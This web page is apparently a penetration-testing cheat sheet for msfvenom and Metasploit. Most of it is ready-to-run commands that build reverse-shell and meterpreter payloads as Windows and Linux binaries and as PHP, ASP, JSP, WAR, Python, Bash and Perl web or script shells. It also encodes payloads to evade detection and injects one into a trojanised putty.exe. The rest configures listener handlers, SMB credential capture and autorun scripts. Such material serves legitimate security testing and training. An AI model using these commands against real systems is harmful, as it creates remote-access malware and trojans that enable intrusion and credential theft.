Skip to content

MSFVenom

MSFVenom

    -p, --payload    <payload>       Payload to use. Specify a '-' or stdin to use custom payloads
    -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
    -n, --nopsled    <length>        Prepend a nopsled of [length] size on to the payload
    -f, --format     <format>        Output format (use --help-formats for a list)
    -e, --encoder    [encoder]       The encoder to use
    -a, --arch       <architecture>  The architecture to use
        --platform   <platform>      The platform of the payload
    -s, --space      <length>        The maximum size of the resulting payload
    -b, --bad-chars  <list>          The list of characters to avoid example: '\x00\xff'
    -i, --iterations <count>         The number of times to encode the payload
    -c, --add-code   <path>          Specify an additional win32 shellcode file to include
    -x, --template   <path>          Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
        --payload-options            List the payload's standard options
    -o, --out   <path>               Save the payload
    -v, --var-name <name>            Specify a custom variable name to use for certain output formats
    -h, --help                       Show this message
        --help-formats               List available formats

Listing Modules

List payloads:
msfvenom -l payloads

List Encoders:
msfvenom -l encoders

List Payload Options:

msfvenom -p [payload] --payload-options

Examples

Linux Binaries:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows Binaries:
Encoding, Bad Characters and using a template

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f dll -o pentestlab.dll
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f exe -o met_reverse_tcp.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f exe -i 5 -e x86/shikata_ga_nai -o mal.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f exe --bad-chars '\x00\x0A\x0D' -o payload.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f exe -a x86 --platform windows -x putty.exe -k -e x86/shikata_ga_nai -i 5 --bad-chars '\x00\x0A\x0D' -o putty1.exe

PHP Web Payloads:

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f raw > shell.php

ASP Web Payloads:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f asp > shell.asp

JSP Web Payloads:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f raw > shell.jsp

WAR Web Payloads:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f war > shell.war

Python Scripting Payloads:

msfvenom -p cmd/unix/reverse_python LHOST=192.168.100.3 LPORT=44444 -f raw > shell.py

BASH Scripting Payloads:

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.100.3 LPORT=44444 -f raw > shell.sh

Perl Scripting Payloads:

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.100.3 LPORT=44444 -f raw > shell.pl

Handlers

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

mssf > use exploit/multi/handler 
msf exploit(handler) > setg PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
set LHOST 10.11.0.159
set LPORT 4343
LPORT => 4343
msetg SHELL cmd.exe
exploit -j -z

set consolelogging true

set loglevel 5
set sessionlogging true
set timestampoutput true
set prompt %T S:%S J:%J
setg VERBOSE true
use auxiliary/server/capture/smb
set JOHNPWFILE john.txt
run

use multi/handler
set payload windows/meterpreter/reverse_tcp
setg LHOST 0.0.0.0
set SSL true
set LPORT 5667
setg AutoLoadStdapi true
setg AutoSystemInfo true
setg ExitOnSession false
setg EnableStageEncoding true
exploit -j -z

set payload windows/x64/meterpreter/reverse_tcp
set lport 5666
setg lhost 0.0.0.0
set payload windows/meterpreter/reverse_winhttps
set LPORT 443
set HandlerSSLCert /opt/CERT.pem
set IgnoreUnknownPayloads true
set AutoRunScript 'post/multi/gather/run_console_rc_file RESOURCE=/opt/autorun.rc'
set StagerVerifySSLCert true
exploit -j -z
setg Exe::CUSTOM /opt/ConsoleApp4.exe
set payload windows/meterpreter/reverse_tcp
set LPORT 5666
set HandlerSSLCert /opt/CERT.pem
set IgnoreUnknownPayloads true
set StagerVerifySSLCert true
set AutoRunScript 'post/multi/gather/run_console_rc_file RESOURCE=/opt/autorun1.rc'
exploit -j -z